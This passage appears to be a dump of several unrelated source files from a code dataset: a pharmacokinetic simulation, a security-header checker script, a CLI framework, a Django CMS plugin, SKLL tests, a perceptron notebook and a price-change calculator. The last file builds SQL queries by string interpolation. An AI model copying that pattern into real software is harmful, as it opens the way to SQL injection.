self.g = g
self.g_T = g_T
self.alpha = alpha
self.Ks[2] = calc_sibuya_kernel(self.N+1, self.alpha)
self.Ks[5] = calc_sibuya_kernel(self.N+1, self.alpha)
self.anom_rates = [None] * self.n_species
self.anom_rates[2] = self.Qs[2] / (self.Vs[2] * self.Rs[2])
self.anom_rates[5] = self.Qs[2] / (self.Vs[-1])
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[2] = self.removal_flux_anomalous(n)[5]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + self.removal_flux_anomalous(n)[2] + g_N
return creation
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[2,0] = 0.
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
rates[5,2] = 0.
return rates
T = 100.0
dT = 0.01
ts = np.arange(0., T, dT)
initial = [0., 0., 0., 0., 0., 0.]
mu = 0.5 # Kidney removal rate
V_max = 2.69
K_m = 0.59
# [P, R, F, K, L, A]
Vs = [28.6, 6.90, 15.10, 0.267, 1.508, 1.570]
Qs = [1.46, 1.43, 0.29, 1.14, 1.52]
Rs = [0.69, 0.79, 0.39, 0.80, 0.78]
alpha = 0.8
g = 1.0
g_T = 1.0
dtrw = DTRW_PBPK(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T)
dtrw_anom = DTRW_PBPK_anom(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T, alpha)
dtrw.solve_all_steps()
dtrw_anom.solve_all_steps()
max_level = max([dtrw.Xs[0,:].max(), dtrw.Xs[1,:].max(), dtrw.Xs[2,:].max(), dtrw.Xs[3,:].max(), dtrw.Xs[4,:].max(), dtrw.Xs[5,:].max()])
fig = plt.figure(figsize=(8,8))
plt.xlim(0,T)
plt.ylim(0,1.1 * max_level)
plt.xlabel('Time')
P, = plt.plot(ts, dtrw.Xs[0,:])
R, = plt.plot(ts, dtrw.Xs[1,:])
F, = plt.plot(ts, dtrw.Xs[2,:])
K, = plt.plot(ts, dtrw.Xs[3,:])
L, = plt.plot(ts, dtrw.Xs[4,:])
A, = plt.plot(ts, dtrw.Xs[5,:])
plt.legend([P, R, F, K, L, A], ["Poorly perfused", "Richly perfused", "Fatty tissue", "Kidneys", "Liver", "Arterial blood"])
Pa, = plt.plot(ts, dtrw_anom.Xs[0,:],'b:')
Ra, = plt.plot(ts, dtrw_anom.Xs[1,:],'g:')
Fa, = plt.plot(ts, dtrw_anom.Xs[2,:],'r:')
Ka, = plt.plot(ts, dtrw_anom.Xs[3,:],'c:')
La, = plt.plot(ts, dtrw_anom.Xs[4,:],'m:')
Aa, = plt.plot(ts, dtrw_anom.Xs[5,:],'y:')
plt.show()
T, = plt.plot(ts, dtrw.Xs.sum(0), 'k')
Ta, = plt.plot(ts, dtrw_anom.Xs.sum(0), 'k:')
plt.show()
|
gpl-2.0
| 154,471,276,779,151,000
| 31.822485
| 137
| 0.491437
| false
| 2.346447
| false
| false
| false
|
secopsconsult/websitechecks
|
securityheaders.py
|
1
|
2724
|
#!/usr/bin/env python
'''
Script to check for the presence of Security headers and rate the site
More info:
https://securityheaders.io/
'''
import optparse
import mechanize
def validateHeaders(header, debug):
if (debug):
print "[+] Validating headers"
print "[~] Headers: " + str(header)
if (debug):
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: Header not Empty"
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: " + str(header.getheaders('Public-Key-Pins')[0])
else:
print "[~] No HPKP Header present"
if (debug):
if (len(header.getheaders('Content-Security-Policy')) > 0):
print "[+] CSP Header: Header not Empty"
if (len(header.getheaders('Content-Security-Policy')) > 0):
print "[+] CSP Header: " + str(header.getheaders('Content-Security-Policy')[0])
else:
print "[~] No CSP Header present"
if (debug):
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: Header not Empty"
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: " + str(header.getheaders('Strict-Transport-Security')[0])
else:
print "[-] No HSTS Header present"
return
def viewPage(url, agent, debug):
if ((url.startswith("http://") == False) and (url.startswith("https://") == False)):
url = "https://" + url
if (debug):
print "[+] Browsing : " +url.strip() +" As " + agent.strip()
browser = mechanize.Browser()
browser.set_handle_robots(False)
    browser.addheaders = [('User-agent', agent),
                          ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
browser.set_handle_refresh(False)
    page = browser.open(url.strip())
    if (debug):
        print "[+] Response Code: " + str(page.code)
    return page.info()
def main():
# Options for the script
    parser = optparse.OptionParser('Usage: %prog -u <url> -a <agent>')
parser.add_option('-u', dest='url', type='string', help='Specify the URL')
parser.add_option('-a', dest='agent', type='string', help='Specify the user agent')
parser.add_option('-d', dest='debug', action="store_true", default=False, help='Debug Mode')
(options, args) = parser.parse_args()
if (options.url == None):
print parser.usage
exit(0)
if (options.agent == None):
if (options.debug):
print "[-] No Useragent Set. Defaulting to Mozilla"
options.agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
header = viewPage(options.url, options.agent, options.debug)
validateHeaders(header, options.debug)
if __name__ == '__main__':
main()
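# Example invocations (illustrative; any reachable site can be substituted):
#   python securityheaders.py -u https://example.com
#   python securityheaders.py -u https://example.com -d -a "Mozilla/5.0"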
|
mit
| -1,188,025,213,629,344,800
| 27.673684
| 100
| 0.647577
| false
| 3
| false
| false
| false
|
lukaszb/monolith
|
monolith/cli/base.py
|
1
|
10479
|
import os
import sys
import argparse
from collections import namedtuple
from monolith.compat import OrderedDict
from monolith.compat import unicode
from monolith.cli.exceptions import AlreadyRegistered
from monolith.cli.exceptions import CommandError
from monolith.utils.imports import get_class
Argument = namedtuple('Argument', 'args kwargs')
def arg(*args, **kwargs):
"""
Returns *Argument* namedtuple in format: ``(args, kwargs)``. In example::
>>> arg(1, 2, 'foo', 'bar')
Argument(args=(1, 2, 'foo', 'bar'), kwargs={})
>>> arg('a', 1, foo='bar')
Argument(args=('a', 1), kwargs={'foo': 'bar'})
"""
return Argument(args, kwargs)
class Parser(argparse.ArgumentParser):
"""
Subclass of ``argparse.ArgumentParser`` providing more control over output
stream.
"""
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stderr)
super(Parser, self).__init__(*args, **kwargs)
def _print_message(self, message, file=None):
if file is None:
file = self.stream
super(Parser, self)._print_message(unicode(message), file)
class ExecutionManager(object):
usage = None
completion = False
completion_env_var_name = ''
parser_cls = Parser
def __init__(self, argv=None, stderr=None, stdout=None):
if argv is None:
argv = [a for a in sys.argv]
self.prog_name = os.path.basename(argv[0])
self.argv = argv[1:]
self.registry = {}
self.stderr = stderr or sys.stderr
self.stdout = stdout or sys.stdout
for name, Command in self.get_commands_to_register().items():
self.register(name, Command)
def get_usage(self):
"""
Returns *usage* text of the main application parser.
"""
return self.usage
def get_parser(self):
"""
Returns :class:`monolith.cli.Parser` instance for this
*ExecutionManager*.
"""
parser = self.parser_cls(prog=self.prog_name, usage=self.get_usage(),
stream=self.stderr)
subparsers = parser.add_subparsers(
title='subcommands',
)
for name, command in self.registry.items():
cmdparser = subparsers.add_parser(name, help=command.help)
for argument in command.get_args():
cmdparser.add_argument(*argument.args, **argument.kwargs)
command.setup_parser(parser, cmdparser)
cmdparser.set_defaults(func=command.handle)
return parser
def register(self, name, Command, force=False):
"""
Registers given ``Command`` (as given ``name``) at this
*ExecutionManager*'s registry.
:param name: name in the registry under which given ``Command``
should be stored.
:param Command: should be subclass of
:class:``monolith.cli.base.BaseCommand``
:param force: Forces registration if set to ``True`` - even if another
command was already registered, it would be overridden and no
execption would be raised. Defaults to ``False``.
:raises AlreadyRegistered: If another command was already registered
under given ``name``.
"""
if not force and name in self.registry:
raise AlreadyRegistered('Command %r is already registered' % name)
command = Command(self.prog_name, self.stdout)
command.manager = self
self.registry[name] = command
command.post_register(self)
def get_commands(self):
"""
Returns commands stored in the registry (sorted by name).
"""
commands = OrderedDict()
for cmd in sorted(self.registry.keys()):
commands[cmd] = self.registry[cmd]
return commands
def get_commands_to_register(self):
"""
        Returns a dictionary mapping *name* to *Command* (either a class or a
        string pointing at the command class).
"""
return {}
def call_command(self, cmd, *argv):
"""
Runs a command.
:param cmd: command to run (key at the registry)
:param argv: arguments that would be passed to the command
"""
parser = self.get_parser()
args = [cmd] + list(argv)
namespace = parser.parse_args(args)
self.run_command(namespace)
def execute(self, argv=None):
"""
Executes command based on given arguments.
"""
if self.completion:
self.autocomplete()
parser = self.get_parser()
namespace = parser.parse_args(argv)
if hasattr(namespace, 'func'):
self.run_command(namespace)
def run_command(self, namespace):
try:
namespace.func(namespace)
except CommandError as err:
sys.stderr.write('ERROR: %s\n' % err.message)
sys.exit(err.code)
def autocomplete(self):
"""
If *completion* is enabled, this method would write to ``self.stdout``
completion words separated with space.
"""
if self.completion_env_var_name not in os.environ:
return
cwords = os.environ['COMP_WORDS'].split()[1:]
cword = int(os.environ['COMP_CWORD'])
try:
current = cwords[cword-1]
except IndexError:
current = ''
cmd_names = self.get_commands().keys()
if current:
self.stdout.write(unicode(' '.join(
[name for name in cmd_names if name.startswith(current)])))
sys.exit(1)
class SimpleExecutionManager(ExecutionManager):
def __init__(self, program, commands):
"""
:param program: name of the program under which commands would be
executed (usually name of the program).
:param commands: dictionary mapping subcommands to proper command
classes. Values can be string - in that case proper command class
would be importer and used. Example::
{
'subcommand1': SomeCommand,
'subcommand2': 'myprogram.commands.another.AnotherCommand',
}
"""
self.simple_commands = commands
super(SimpleExecutionManager, self).__init__([program])
def get_commands_to_register(self):
"""
Returns dictionary with commands given during construction. If value is
a string, it would be converted into proper class pointer.
"""
return dict((key, get_class(value)) for key, value in
self.simple_commands.items())
class BaseCommand(object):
"""
Base command class that should be subclassed by concrete commands.
**Attributes**
- ``help``: Help description for this command. Defaults to empty string.
- ``args``: List of :class:`Argument` instances. Defaults to empty list.
- ``prog_name``: Program name of *ExecutionManager* within which this
command is run. Defaults to ``None``.
- ``stdout``: File-like object. Command should write to it. Defaults to
``sys.stdout``.
"""
help = ''
args = []
def __init__(self, prog_name=None, stdout=None):
self.prog_name = prog_name or ''
self.stdout = stdout or sys.stdout
def get_args(self):
"""
Returns list of :class:`Argument` instances for the parser. By default,
it returns ``self.args``.
"""
return self.args or []
def setup_parser(self, parser, cmdparser):
"""
This would be called when command is registered by ExecutionManager
after arguments from ``get_args`` are processed.
Default implementation does nothing.
:param parser: Global argparser.ArgumentParser
:param cmdparser: Subparser related with this command
"""
def handle(self, namespace):
"""
Handles given ``namespace`` and executes command. Should be overridden
at subclass.
"""
raise NotImplementedError
def post_register(self, manager):
"""
Performs actions once this command is registered within given
``manager``. By default it does nothing.
"""
pass
class LabelCommand(BaseCommand):
"""
Command that works on given position arguments (*labels*). By default, at
least one *label* is required. This is controlled by *labels_required*
attribute.
**Extra attributes**:
- ``labels_required``: If ``True``, at least one *label* is required,
otherwise no positional arguments could be given. Defaults to ``True``.
"""
labels_required = True
def get_labels_arg(self):
"""
Returns argument for *labels*.
"""
nargs = self.labels_required and '+' or '*'
return arg('labels', nargs=nargs)
def get_args(self):
return self.args + [self.get_labels_arg()]
def handle(self, namespace):
"""
Handles given ``namespace`` by calling ``handle_label`` method
for each given *label*.
"""
for label in namespace.labels:
self.handle_label(label, namespace)
else:
self.handle_no_labels(namespace)
def handle_label(self, label, namespace):
"""
Handles single *label*. Should be overridden at subclass.
"""
raise NotImplementedError
def handle_no_labels(self, namespace):
"""
        Performs some action if no *labels* were given. By default it does
nothing.
"""
pass
class SingleLabelCommand(BaseCommand):
"""
Command that works on given positional argument (*label*).
**Extra arguments**:
- ``label_default_value``: If no *label* were given, this would be default
value that would be passed to ``namespace``. Defaults to ``None``.
"""
label_default_value = None
def get_label_arg(self):
"""
Returns argument for *label*.
"""
return arg('label', default=self.label_default_value, nargs='?')
def get_args(self):
return self.args + [self.get_label_arg()]
def handle(self, namespace):
"""
Calls ``handle_label`` method for given *label*.
"""
self.handle_label(namespace.label, namespace)
def handle_label(self, label, namespace):
"""
Handles *label*. Should be overridden at subclass.
"""
raise NotImplementedError
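# Illustrative sketch (not part of the original module): wiring a minimal
# command into an ExecutionManager. The command name 'hello' and the program
# name 'myprog' are made up for the example.
class _ExampleHelloCommand(BaseCommand):
    help = 'prints a greeting'
    args = [arg('-n', '--name', default='world')]

    def handle(self, namespace):
        self.stdout.write('hello %s\n' % namespace.name)


class _ExampleManager(ExecutionManager):
    def get_commands_to_register(self):
        return {'hello': _ExampleHelloCommand}


def _example_run():
    manager = _ExampleManager(['myprog'])
    manager.execute(['hello', '--name', 'monolith'])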
|
bsd-2-clause
| -1,535,403,399,572,830,500
| 30.280597
| 79
| 0.597958
| false
| 4.436494
| false
| false
| false
|
jbazik/cmsplugin-video-youtube
|
cmsplugin_video_youtube/cms_plugins.py
|
1
|
1467
|
from django.utils.translation import ugettext as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cmsplugin_video_youtube.models import YouTubeVideo
from cmsplugin_video_youtube.forms import YouTubeVideoForm
class YouTubeVideoPlugin(CMSPluginBase):
model = YouTubeVideo
name = _("YouTubeVideo")
render_template = "cmsplugin_video_youtube/embed.html"
form = YouTubeVideoForm
text_enabled = True
fieldsets = (
(None, {
'fields': ('name', 'video_id', 'width', 'height'),
}),
('Advanced Options', {
'classes': ('collapse',),
'fields': (
'fullscreen',
'autohide',
'autoplay',
'color',
'controls',
'iv_load',
'loop',
'modestbranding',
'playlist',
'related',
'showinfo',
'start',
'theme',
),
}),
)
def render(self, context, instance, placeholder):
context.update({
'object': instance,
'placeholder': placeholder
})
return context
def icon_src(self, instance):
return u"http://img.youtube.com/vi/%s/default.jpg" % instance.video_id
def icon_alt(self, instance):
return u"%s" % instance
plugin_pool.register_plugin(YouTubeVideoPlugin)
|
lgpl-3.0
| 6,135,923,229,854,246,000
| 26.166667
| 78
| 0.537151
| false
| 4.445455
| false
| false
| false
|
ernfrid/skll
|
tests/test_classification.py
|
1
|
12834
|
# License: BSD 3 clause
"""
Tests related to classification experiments.
:author: Michael Heilman (mheilman@ets.org)
:author: Nitin Madnani (nmadnani@ets.org)
:author: Dan Blanchard (dblanchard@ets.org)
:author: Aoife Cahill (acahill@ets.org)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import csv
import glob
import itertools
import json
import os
from io import open
from os.path import abspath, dirname, exists, join
import numpy as np
from nose.tools import eq_, assert_almost_equal, raises
from sklearn.base import RegressorMixin
from skll.data import FeatureSet
from skll.data.writers import NDJWriter
from skll.config import _parse_config_file
from skll.experiments import run_configuration
from skll.learner import Learner
from skll.learner import _DEFAULT_PARAM_GRIDS
from utils import (make_classification_data, make_regression_data,
make_sparse_data, fill_in_config_paths_for_single_file)
_ALL_MODELS = list(_DEFAULT_PARAM_GRIDS.keys())
_my_dir = abspath(dirname(__file__))
def setup():
train_dir = join(_my_dir, 'train')
if not exists(train_dir):
os.makedirs(train_dir)
test_dir = join(_my_dir, 'test')
if not exists(test_dir):
os.makedirs(test_dir)
output_dir = join(_my_dir, 'output')
if not exists(output_dir):
os.makedirs(output_dir)
def tearDown():
train_dir = join(_my_dir, 'train')
test_dir = join(_my_dir, 'test')
output_dir = join(_my_dir, 'output')
config_dir = join(_my_dir, 'configs')
if exists(join(train_dir, 'train_single_file.jsonlines')):
os.unlink(join(train_dir, 'train_single_file.jsonlines'))
if exists(join(test_dir, 'test_single_file.jsonlines')):
os.unlink(join(test_dir, 'test_single_file.jsonlines'))
if exists(join(output_dir, 'rare_class.predictions')):
os.unlink(join(output_dir, 'rare_class.predictions'))
for output_file in glob.glob(join(output_dir, 'train_test_single_file_*')):
os.unlink(output_file)
config_file = join(config_dir, 'test_single_file.cfg')
if exists(config_file):
os.unlink(config_file)
def check_predict(model, use_feature_hashing=False):
"""
This tests whether predict task runs and generates the same
number of predictions as samples in the test set. The specified
model indicates whether to generate random regression
or classification data.
"""
# create the random data for the given model
if issubclass(model, RegressorMixin):
train_fs, test_fs, _ = \
make_regression_data(use_feature_hashing=use_feature_hashing,
feature_bins=5)
# feature hashing will not work for Naive Bayes since it requires
# non-negative feature values
elif model.__name__ == 'MultinomialNB':
train_fs, test_fs = \
make_classification_data(use_feature_hashing=False,
non_negative=True)
else:
train_fs, test_fs = \
make_classification_data(use_feature_hashing=use_feature_hashing,
feature_bins=25)
# create the learner with the specified model
learner = Learner(model.__name__)
# now train the learner on the training data and use feature hashing when
# specified and when we are not using a Naive Bayes model
learner.train(train_fs, grid_search=False)
# now make predictions on the test set
predictions = learner.predict(test_fs)
# make sure we have the same number of outputs as the
# number of test set samples
eq_(len(predictions), test_fs.features.shape[0])
# the runner function for the prediction tests
def test_predict():
for model, use_feature_hashing in \
itertools.product(_ALL_MODELS, [True, False]):
yield check_predict, model, use_feature_hashing
# the function to create data with rare labels for cross-validation
def make_rare_class_data():
"""
We want to create data that has five instances per class, for three labels
and for each instance within the group of 5, there's only a single feature
firing
"""
ids = ['EXAMPLE_{}'.format(n) for n in range(1, 16)]
y = [0] * 5 + [1] * 5 + [2] * 5
X = np.vstack([np.identity(5), np.identity(5), np.identity(5)])
feature_names = ['f{}'.format(i) for i in range(1, 6)]
features = []
for row in X:
features.append(dict(zip(feature_names, row)))
return FeatureSet('rare-class', ids, features=features, labels=y)
def test_rare_class():
"""
Test cross-validation when some labels are very rare
"""
rare_class_fs = make_rare_class_data()
prediction_prefix = join(_my_dir, 'output', 'rare_class')
learner = Learner('LogisticRegression')
learner.cross_validate(rare_class_fs,
grid_objective='unweighted_kappa',
prediction_prefix=prediction_prefix)
with open(prediction_prefix + '.predictions', 'r') as f:
reader = csv.reader(f, dialect='excel-tab')
next(reader)
pred = [row[1] for row in reader]
eq_(len(pred), 15)
def check_sparse_predict(learner_name, expected_score, use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
# train a logistic regression classifier on the training
    # data and evaluate on the testing data
learner = Learner(learner_name)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_sparse_predict():
for learner_name, expected_scores in zip(['LogisticRegression',
'DecisionTreeClassifier',
'RandomForestClassifier',
'AdaBoostClassifier',
'MultinomialNB',
'KNeighborsClassifier'],
[(0.45, 0.51), (0.5, 0.51),
(0.46, 0.46), (0.5, 0.5),
(0.44, 0), (0.51, 0.43)]):
yield check_sparse_predict, learner_name, expected_scores[0], False
if learner_name != 'MultinomialNB':
yield check_sparse_predict, learner_name, expected_scores[1], True
def check_sparse_predict_sampler(use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
if use_feature_hashing:
sampler = 'RBFSampler'
sampler_parameters = {"gamma": 1.0, "n_components": 50}
else:
sampler = 'Nystroem'
sampler_parameters = {"gamma": 1.0, "n_components": 50,
"kernel": 'rbf'}
learner = Learner('LogisticRegression',
sampler=sampler,
sampler_kwargs=sampler_parameters)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
expected_score = 0.44 if use_feature_hashing else 0.48999999999999999
assert_almost_equal(test_score, expected_score)
def test_sparse_predict_sampler():
yield check_sparse_predict_sampler, False
yield check_sparse_predict_sampler, True
def make_single_file_featureset_data():
"""
Write a training file and a test file for tests that check whether
specifying train_file and test_file actually works.
"""
train_fs, test_fs = make_classification_data(num_examples=600,
train_test_ratio=0.8,
num_labels=2,
num_features=3,
non_negative=False)
# Write training feature set to a file
train_path = join(_my_dir, 'train', 'train_single_file.jsonlines')
writer = NDJWriter(train_path, train_fs)
writer.write()
# Write test feature set to a file
test_path = join(_my_dir, 'test', 'test_single_file.jsonlines')
writer = NDJWriter(test_path, test_fs)
writer.write()
def test_train_file_test_file():
"""
Test that train_file and test_file experiments work
"""
# Create data files
make_single_file_featureset_data()
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'))
run_configuration(config_path, quiet=True)
# Check results
with open(join(_my_dir, 'output', ('train_test_single_file_train_train_'
'single_file.jsonlines_test_test_single'
'_file.jsonlines_RandomForestClassifier'
'.results.json'))) as f:
result_dict = json.load(f)[0]
assert_almost_equal(result_dict['score'], 0.925)
@raises(ValueError)
def test_train_file_and_train_directory():
"""
Test that train_file + train_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
train_directory='foo')
_parse_config_file(config_path)
@raises(ValueError)
def test_test_file_and_test_directory():
"""
Test that test_file + test_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
test_directory='foo')
_parse_config_file(config_path)
def check_adaboost_predict(base_estimator, algorithm, expected_score):
train_fs, test_fs = make_sparse_data()
    # train an AdaBoostClassifier on the training data and evaluate on the
# testing data
learner = Learner('AdaBoostClassifier', model_kwargs={'base_estimator': base_estimator,
'algorithm': algorithm})
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_adaboost_predict():
for base_estimator_name, algorithm, expected_score in zip(['MultinomialNB',
'DecisionTreeClassifier',
'SGDClassifier',
'SVC'],
['SAMME.R', 'SAMME.R',
'SAMME', 'SAMME'],
[0.45, 0.5, 0.45, 0.43]):
yield check_adaboost_predict, base_estimator_name, algorithm, expected_score
|
bsd-3-clause
| 3,986,852,876,339,038,700
| 38.489231
| 91
| 0.52883
| false
| 4.3154
| true
| false
| false
|
mikhtonyuk/rxpython
|
concurrent/futures/cooperative/ensure_exception_handled.py
|
1
|
3261
|
import traceback
class EnsureExceptionHandledGuard:
"""Helper for ensuring that Future's exceptions were handled.
This solves a nasty problem with Futures and Tasks that have an
exception set: if nobody asks for the exception, the exception is
never logged. This violates the Zen of Python: 'Errors should
never pass silently. Unless explicitly silenced.'
However, we don't want to log the exception as soon as
set_exception() is called: if the calling code is written
properly, it will get the exception and handle it properly. But
we *do* want to log it if result() or exception() was never called
-- otherwise developers waste a lot of time wondering why their
buggy code fails silently.
An earlier attempt added a __del__() method to the Future class
itself, but this backfired because the presence of __del__()
prevents garbage collection from breaking cycles. A way out of
this catch-22 is to avoid having a __del__() method on the Future
class itself, but instead to have a reference to a helper object
with a __del__() method that logs the traceback, where we ensure
that the helper object doesn't participate in cycles, and only the
Future has a reference to it.
The helper object is added when set_exception() is called. When
the Future is collected, and the helper is present, the helper
object is also collected, and its __del__() method will log the
traceback. When the Future's result() or exception() method is
    called (and a helper object is present), it removes the helper
object, after calling its clear() method to prevent it from
logging.
One downside is that we do a fair amount of work to extract the
traceback from the exception, even when it is never logged. It
would seem cheaper to just store the exception object, but that
references the traceback, which references stack frames, which may
reference the Future, which references the _EnsureExceptionHandledGuard,
and then the _EnsureExceptionHandledGuard would be included in a cycle,
which is what we're trying to avoid! As an optimization, we don't
immediately format the exception; we only do the work when
activate() is called, which call is delayed until after all the
Future's callbacks have run. Since usually a Future has at least
one callback (typically set by 'yield from') and usually that
    callback extracts the result or exception, thereby removing the need to
format the exception.
PS. I don't claim credit for this solution. I first heard of it
in a discussion about closing files when they are collected.
"""
__slots__ = ['exc', 'tb', 'hndl', 'cls']
def __init__(self, exc, handler):
self.exc = exc
self.hndl = handler
self.cls = type(exc)
self.tb = None
def activate(self):
exc = self.exc
if exc is not None:
self.exc = None
self.tb = traceback.format_exception(exc.__class__, exc,
exc.__traceback__)
def clear(self):
self.exc = None
self.tb = None
def __del__(self):
if self.tb:
self.hndl(self.cls, self.tb)
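# Illustrative sketch (not part of the original module): how a Future-like
# object might use the guard. The _MiniFuture class and the logging handler
# below are assumptions made for the example, not this package's actual API.
def _example_guard_usage():
    import logging

    def _log_unhandled(exc_class, tb_lines):
        logging.error('Future exception was never retrieved:\n%s', ''.join(tb_lines))

    class _MiniFuture(object):
        def set_exception(self, exc):
            self._exc = exc
            self._guard = EnsureExceptionHandledGuard(exc, _log_unhandled)
            # normally activate() is delayed until the callbacks have run
            self._guard.activate()

        def exception(self):
            # retrieving the exception silences the guard
            self._guard.clear()
            return self._exc

    fut = _MiniFuture()
    fut.set_exception(ValueError('boom'))
    return fut.exception()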
|
mit
| -4,323,449,782,726,556,700
| 42.48
| 76
| 0.682306
| false
| 4.418699
| false
| false
| false
|
bhedayat/Neural-Nets
|
Perceptron.py
|
1
|
3593
|
# coding: utf-8
# In[22]:
#Flower Classifier with Perceptron
#Read in data
data = [] #training data
data1 = [] #test data
import numpy as np
import matplotlib.pyplot as plt
from random import randint
# NOTE: the original notebook cell never opens its data files; the paths below
# are assumed placeholders for the Iris training and test sets read in next.
file = open('iris_train.data')   # assumed training data file
file1 = open('iris_test.data')   # assumed test data file
for line in file:
l = (line.split(","))
l[0] = float(l[0])
l[1] = float(l[1])
l[2] = float(l[2])
l[3] = float(l[3])
data.append (l)
for line1 in file1:
h = (line1.split(","))
h[0] = float(h[0])
h[1] = float(h[1])
h[2] = float(h[2])
h[3] = float(h[3])
data1.append (h)
#Label classes with numbers
for d in range(len(data)):
if data[d][4] == 'Iris-setosa\n':
data[d][4] = 0
elif data[d][4] == 'Iris-versicolor\n':
data[d][4] = 1
for d in range(len(data1)):
if data1[d][4] == 'Iris-setosa\n':
data1[d][4] = 0
elif data1[d][4] == 'Iris-versicolor\n':
data1[d][4] = 1
iris_data = np.array(data)
iris_test = np.array(data1)
#Normalize features with Z-score
for d in range(iris_data.shape[1]-1):
u = np.mean(iris_data[:,d])
s = np.std(iris_data[:,d])
iris_data[:,d] = (iris_data[:,d] - u)/s
iris_test[:,d] = (iris_test[:,d] - u)/s
#Scatter plots in different feature space
f1 = iris_data[:,0] #Sepal length
f2 = iris_data[:,1] #Sepal width
f3 = iris_data[:,2] #Petal length
f4 = iris_data[:,3] #Petal width
cluster = iris_data[:,4] #Flower class
plt.figure(1)
plt.scatter(f1[cluster==0],f2[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f2[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.title('Sepal length vs. Sepal width')
plt.figure(2)
plt.scatter(f1[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal length')
plt.title('Sepal length vs. Petal length')
plt.figure(3)
plt.scatter(f1[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal width')
plt.title('Sepal length vs. Petal width')
plt.figure(4)
plt.scatter(f2[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal length')
plt.title('Sepal width vs. Petal length')
plt.figure(5)
plt.scatter(f2[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal width')
plt.title('Sepal width vs. Petal width')
plt.figure(6)
plt.scatter(f3[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f3[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Petal length')
plt.ylabel('Petal width')
plt.title('Petal length vs. Petal width')
#plt.show()
#Append bias to data set
x = -1*np.ones((len(iris_data),1))
a_iris_data = np.concatenate((x, iris_data), 1)
y = -1*np.ones((len(iris_test),1))
a_iris_test = np.concatenate((y, iris_test), 1)
w = [0]*(len(a_iris_data[0])-1)
#Perceptron Gradient Descent
alpha = 1 #Learning rate
for a in range(30):
r = randint(0,len(a_iris_data)-1) #randomly choose training examples
output = a_iris_data[r,0:5].dot(w)
teacher = a_iris_data[r,5]
if output >= -w[0]:
output = 1
elif output < -w[0]:
output = 0
w = w+alpha*(teacher-output)*(a_iris_data[r,0:5]) #delta rule
print(w)
#Testing accuracy
test_output = a_iris_test[:,0:5].dot(w)
for o in range(len(test_output)):
if test_output[o] >= -w[0]:
test_output[o] = 1
elif test_output[o] < -w[0]:
test_output[o] = 0
err = test_output == a_iris_test[:,5]
err = err.astype(int)
1 - np.mean(err)
# In[ ]:
|
apache-2.0
| -4,896,690,168,427,554,000
| 26.638462
| 72
| 0.623991
| false
| 2.519635
| true
| false
| false
|
vishakh/metamkt
|
metamkt/standalone/price_change_calculator.py
|
1
|
2433
|
import common
def calculate_price_change(conn, entity_id, mysql_interval):
result = conn.execute("""
select
(select price from PriceHistory where entity_id=%s order by timestamp desc limit 1) -
(select price from PriceHistory where entity_id=%s and timestamp < (utc_timestamp() - %s)
order by timestamp desc limit 1)""" % (entity_id, entity_id, mysql_interval))
change = result.fetchall()[0][0]
return change
def insert_price_change(conn, entity_id, interval, value):
conn.execute("""INSERT INTO PriceChange (entity_id, term, value) VALUES (%s, '%s', %s)"""
% (entity_id, interval, value))
def calculate_price_changes():
log = common.get_logger()
log.info('Calculating price changes..')
conn = common.get_connection()
trans = conn.begin()
